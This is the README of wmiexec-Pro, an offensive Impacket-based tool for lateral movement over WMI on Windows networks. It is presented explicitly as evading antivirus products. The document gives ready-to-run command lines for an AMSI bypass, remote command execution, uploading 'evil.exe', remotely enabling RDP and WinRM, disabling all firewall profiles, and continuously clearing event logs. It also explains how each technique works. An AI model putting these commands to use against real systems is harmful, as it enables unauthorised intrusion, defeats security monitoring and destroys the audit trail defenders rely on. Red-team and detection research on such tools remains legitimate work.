New generation of wmiexec.py.

1. Info
2. Features
3. Getting Started
   • Installation
4. Usage
5. Screenshots
6. How it works?
7. References

The new generation of wmiexec.py, more new features, whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement (Windows Defender, HuoRong, 360)

(back to top)

• Main feature: Only need port 135.
• New module: AMSI bypass
• New module: File transfer
• New module: Remote enable RDP via wmi class method
• New module: Windows firewall abusing
• New module: Eventlog looping cleaning
• New module: Remote enable WinRM without touching CMD
• Enhancement: Get command execution output in new way
• Enhancement: Execute vbs file

(back to top)

Only need latest version of Impacket

1. Clone the impacket repository

   git clone https://github.com/fortra/impacket

2. Install imapcket

   cd imapcket && sudo pip3 install .

3. Enjoy it :)

   git clone https://github.com/XiaoliChan/wmiexec-Pro

(back to top)

python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h

Enable/disable amsi bypass:
   python3 wmiexec-pro.py administrator:[email protected] amsi -enable
   python3 wmiexec-pro.py administrator:[email protected] amsi -disable

Execute command:
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" (slient)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -with-output (with output)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -with-output -save (with output and save output to file)
   
Filetransfer:
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload file over 512KB)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (download file over 512KB)
   
RDP:
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable (Auto configure firewall)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable-ram (enable Restricted Admin Mode for PTH)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable-ram (Disable Restricted Admin Mode)

WinRM:
   python3 wmiexec-pro.py administrator:[email protected] winrm -enable
   python3 wmiexec-pro.py administrator:[email protected] winrm -disable

Firewall:
   python3 wmiexec-pro.py administrator:[email protected] firewall -search-port 445
   python3 wmiexec-pro.py administrator:[email protected] firewall -dump (Dump all firewall rules)
   python3 wmiexec-pro.py administrator:[email protected] firewall -rule-id (ID from search port) -rule-op [enable/disable/remove] (enable, disable, remove specify rule)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile enable (Enable all firewall profiles)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile disable (disable all firewall profiles)
   
Eventlog:
   python3 wmiexec-pro.py administrator:[email protected] eventlog -risk-i-know (Looping cleaning eventlog)
   python3 wmiexec-pro.py administrator:[email protected] eventlog -retrive object-ID (Stop looping cleaning eventlog)
   

(back to top)

• Help

  • 

• exec-command

  • 

• filetransfer

  • upload file

    

  • download file

    

(back to top)

• AMSI module:

  • Tal-Liberman's technique from blackhat asia 2018.

• exec-command module:

  • Enhancement of previous project: wmiexec-RegOut, get output from wmi class instead of from registry.

• filetransfer module:

  • For upload: encode the source file as base64 strings into the dropper named WriteFile.vbs, then create a new instance of object ActiveScriptEventConsumer to execute the dropper.
  • For download: remote create a class to store data, then execute the encoder LocalFileIntoClass.vbs to encode the file and store data into the class that just created.

• rdp module:

  • For enable/disable: rdp serivces: control TerminalServices object directly.
  • For enable/disable: Restricted Admin Mode: control registry key DisableRestrictedAdmin via StdRegProv class.

• winrm module:

  • For enable/disable: call Start/StopSerivce() method of Win32_Service.
  • For firewall rules: use module firewall.py to configure firewall of winrm.

• firewall module:

  • Abusing MSFT_NetProtocolPortFilter, MSFT_NetFirewallRule, MSFT_NetFirewallProfile classes.

• eventlog module:

  • Execute the vbs script file ClearEventlog.vbs without remove event and consumer.

• execute-vbs module:

  • Picked from wmipersist.py.

• classMethodEx method:

  • For create class: execute the vbs scritp : CreateClass.vbs to create simple class. (Why? Have no idea how to use PutClass method in impacket.)
  • For remove class: call DeleteClass method to remove class.

(back to top)

• GhostPack/SharpWMI
• impacket
• WMIHACKER
• Microsoft WMI Docs
• Microsoft VBScripts Docs

(back to top)